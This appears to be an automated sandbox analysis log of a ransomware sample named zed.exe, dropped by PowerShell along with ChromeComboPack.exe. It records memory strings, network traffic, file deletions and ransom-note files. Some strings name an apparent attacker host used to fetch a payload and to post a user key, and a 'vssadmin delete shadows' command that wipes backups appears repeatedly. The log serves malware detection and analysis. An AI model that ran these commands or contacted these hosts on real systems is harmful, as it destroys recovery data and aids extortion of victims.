Source: zed.exe, 0000000C.00000002.4739575389.00000132F8EE0000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4739426340.00000132F8DE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: zed.exe, 0000000C.00000002.4735816641.00000132F84E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://peps.python.org/pep-0205/
Source: zed.exe, 0000000C.00000002.4754569858.00007FFD8B3F2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://peps.python.org/pep-0263/
Source: zed.exe, 0000000C.00000002.4739722176.00000132F8FE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://peps.python.org/pep-0685/
Source: zed.exe, 0000000C.00000002.4739575389.00000132F8EE0000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4739426340.00000132F8DE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://pypi.org/project/build/).
Source: zed.exe, 0000000C.00000002.4739094462.00000132F8BE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://refspecs.linuxfoundation.org/elf/gabi4
Source: zed.exe, 0000000C.00000002.4740017345.00000132F9540000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://requests.readthedocs.io
Source: zed.exe, 0000000C.00000002.4739575389.00000132F8EE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/
Source: zed.exe, 0000000C.00000003.3080130566.00000132F83D5000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3080331199.00000132F839E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html
Source: zed.exe, 0000000C.00000003.3081131778.00000132F83DA000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3080130566.00000132F83D5000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3090542361.00000132F8375000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
Source: zed.exe, 0000000C.00000002.4735816641.00000132F84E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages
Source: zed.exe, 0000000C.00000003.3080089518.00000132F842C000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3080130566.00000132F83D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr;
Source: zed.exe, 0000000C.00000003.3080089518.00000132F842C000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3080130566.00000132F83D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr;r
Source: zed.exe, 0000000C.00000002.4736620041.00000132F89A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.apple.com/en-us/HT20
Source: zed.exe, 00000007.00000003.3202803355.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.apple.com/en-us/HT201236
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738469312.00000132F8B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc3610
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4740870539.00000132F982D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc5297
Source: zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
Source: zed.exe, 0000000C.00000002.4744481462.00000132F9F34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc8017
Source: zed.exe, 0000000C.00000002.4740870539.00000132F982D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc8017#page-67
Source: zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc8017#section-8.1.1
Source: zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc8017#section-8.1.2
Source: zed.exe, 0000000C.00000002.4738959618.00000132F8BA2000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4733711080.00000132F7EF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: zed.exe, 0000000C.00000002.4740170642.00000132F9640000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4739872009.00000132F90F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: zed.exe, 0000000C.00000002.4739872009.00000132F90F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy0e
Source: zed.exe, 0000000C.00000002.4739722176.00000132F8FE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: powershell.exe, 00000000.00000002.4741697049.000001EE16F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://usjjsjsj.com.ng
Source: powershell.exe, 00000000.00000002.4741697049.000001EE16F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://usjjsjsj.com.ng/execute/payload.zip
Source: zed.exe, 0000000C.00000002.4745134537.00000132F9FD8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://usjjsjsj.com.ng/post_fenec_key_user.php?
Source: zed.exe, 0000000C.00000002.4739722176.00000132F8FE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://usjjsjsj.com.ng/post_fenec_key_user.php?userID=
Source: zed.exe, 0000000C.00000002.4745134537.00000132F9FD0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://usjjsjsj.com.ng/post_fenec_key_user.php?userID=00000000
Source: zed.exe, 0000000C.00000002.4745134537.00000132F9FD0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://usjjsjsj.com.ng/post_fenec_key_user.php?userID=00000000p
Source: zed.exe, 0000000C.00000003.3082680164.00000132F895D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3089378618.00000132F886F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3084201791.00000132F8880000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3082680164.00000132F8910000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3082961123.00000132F8880000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3087129020.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
Source: zed.exe, 0000000C.00000002.4736620041.00000132F89A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
Source: zed.exe, 0000000C.00000002.4763048462.00007FFDA35CF000.00000002.00000001.01000000.0000001A.sdmp, zed.exe, 0000000C.00000002.4753635454.00007FFD8AFEA000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://www.openssl.org/H
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org
Source: zed.exe, 0000000C.00000003.3084201791.00000132F88FC000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3087129020.00000132F88DD000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3084052929.00000132F895F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3085033089.00000132F8907000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/
Source: zed.exe, 0000000C.00000002.4755379300.00007FFD8B568000.00000008.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://www.python.org/psf/license/
Source: zed.exe, 0000000C.00000002.4754569858.00007FFD8B3F2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://www.python.org/psf/license/)
Source: zed.exe, 0000000C.00000002.4738469312.00000132F8AD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: zed.exe, 0000000C.00000002.4740739040.00000132F9775000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8976000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown

HTTPS traffic detected: 142.132.252.48:443 -> 192.168.2.6:49721 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Deletes shadow drive data (may be related to ransomware)

Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /for=C: /all /quiet
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /for=C: /all /quiet
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /for=C: /all /quiet
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /for=C: /all /quiet

May disable shadow drive data (uses vssadmin)

Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /for=C: /all /quiet
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /for=C: /all /quiet
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /for=C: /all /quiet
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /for=C: /all /quiet

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File deleted: C:\Users\user\Desktop\PALRGUCVEH\TQDFJHPUIU.png
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File deleted: C:\Users\user\Desktop\TQDFJHPUIU.png
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File deleted: C:\Users\user\Desktop\QCOILOQIKC.mp3
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File deleted: C:\Users\user\Desktop\GRXZDKKVDB\GRXZDKKVDB.docx
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File deleted: C:\Users\user\Desktop\PALRGUCVEH\EOWRVPQCCS.xlsx

System Summary

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\Documents\gogjothegoat\payload\zed.exe			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe			Jump to dropped file

Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Windows\System32\ips.txt
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Windows\System32\fennec_key.txt
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Windows\System32\encrypted_files.txt
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Windows\System32\deadline.json

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD344CD63D	0_2_00007FFD344CD63D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD344D5097	0_2_00007FFD344D5097
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD344D6125	0_2_00007FFD344D6125
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD344C7261	0_2_00007FFD344C7261
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD344C53FD	0_2_00007FFD344C53FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD344D2895	0_2_00007FFD344D2895
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD344CA8F2	0_2_00007FFD344CA8F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD344E1AFA	0_2_00007FFD344E1AFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD344E1BFD	0_2_00007FFD344E1BFD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34594345	0_2_00007FFD34594345
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E5301000	6_2_00007FF7E5301000
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E5326964	6_2_00007FF7E5326964
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E53089E0	6_2_00007FF7E53089E0
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E5325C00	6_2_00007FF7E5325C00
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E5325E7C	6_2_00007FF7E5325E7C
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E531DEF0	6_2_00007FF7E531DEF0
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E5319EA0	6_2_00007FF7E5319EA0
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E531E570	6_2_00007FF7E531E570
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E5315D30	6_2_00007FF7E5315D30
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E5311D54	6_2_00007FF7E5311D54
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E53135A0	6_2_00007FF7E53135A0
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E5321874	6_2_00007FF7E5321874
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E53180E4	6_2_00007FF7E53180E4
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E53240AC	6_2_00007FF7E53240AC
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E53208C8	6_2_00007FF7E53208C8
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E5311F60	6_2_00007FF7E5311F60
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E5318794	6_2_00007FF7E5318794
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E5329728	6_2_00007FF7E5329728
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E5311740	6_2_00007FF7E5311740
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E5309800	6_2_00007FF7E5309800
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E531DA5C	6_2_00007FF7E531DA5C
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E530A2DB	6_2_00007FF7E530A2DB
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E5312164	6_2_00007FF7E5312164
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E5311944	6_2_00007FF7E5311944
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E53139A4	6_2_00007FF7E53139A4
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E530A474	6_2_00007FF7E530A474
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E5326418	6_2_00007FF7E5326418
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E53208C8	6_2_00007FF7E53208C8
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E530ACAD	6_2_00007FF7E530ACAD
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E5311B50	6_2_00007FF7E5311B50
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E5323C10	6_2_00007FF7E5323C10
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E5312C10	6_2_00007FF7E5312C10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFD344F27BF	10_2_00007FFD344F27BF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFD344F485C	10_2_00007FFD344F485C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFD345C0B9E	10_2_00007FFD345C0B9E
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 12_2_00007FFD8A2512F0	12_2_00007FFD8A2512F0
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 12_2_00007FFD8A251880	12_2_00007FFD8A251880
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFD344B7DF2	14_2_00007FFD344B7DF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFD344B7046	14_2_00007FFD344B7046
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFD344B7DF2	17_2_00007FFD344B7DF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFD344B7046	17_2_00007FFD344B7046
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9D6E10	32_2_00007FF78C9D6E10
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9B7E30	32_2_00007FF78C9B7E30
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9D7B74	32_2_00007FF78C9D7B74
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9CADC0	32_2_00007FF78C9CADC0
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9CF5D8	32_2_00007FF78C9CF5D8
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9B8D60	32_2_00007FF78C9B8D60
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9C0EBC	32_2_00007FF78C9C0EBC
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9C16DC	32_2_00007FF78C9C16DC
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9C36F0	32_2_00007FF78C9C36F0
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9D4E20	32_2_00007FF78C9D4E20
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9D1AD8	32_2_00007FF78C9D1AD8
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9D7628	32_2_00007FF78C9D7628
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9C9670	32_2_00007FF78C9C9670
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9C8FC0	32_2_00007FF78C9C8FC0
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9C3F2C	32_2_00007FF78C9C3F2C
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9C2758	32_2_00007FF78C9C2758
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9CEF58	32_2_00007FF78C9CEF58
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9C10C8	32_2_00007FF78C9C10C8
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9B983B	32_2_00007FF78C9B983B
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9D708C	32_2_00007FF78C9D708C
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9BA20D	32_2_00007FF78C9BA20D
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9B99DB	32_2_00007FF78C9B99DB
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9DA938	32_2_00007FF78C9DA938
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9CEAC4	32_2_00007FF78C9CEAC4
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9D52BC	32_2_00007FF78C9D52BC
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9C12CC	32_2_00007FF78C9C12CC
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9D1AD8	32_2_00007FF78C9D1AD8
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9D2A84	32_2_00007FF78C9D2A84
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9C23C0	32_2_00007FF78C9C23C0
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9C43F0	32_2_00007FF78C9C43F0
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9C3B28	32_2_00007FF78C9C3B28
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9C0CB8	32_2_00007FF78C9C0CB8
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9C14D8	32_2_00007FF78C9C14D8
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9C6C90	32_2_00007FF78C9C6C90

Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: String function: 00007FF7E5302710 appears 52 times
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: String function: 00007FF78C9B1E50 appears 53 times
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: String function: 00007FFD8A19C090 appears 47 times

Source: unicodedata.pyd.6.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: _overlapped.pyd.6.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
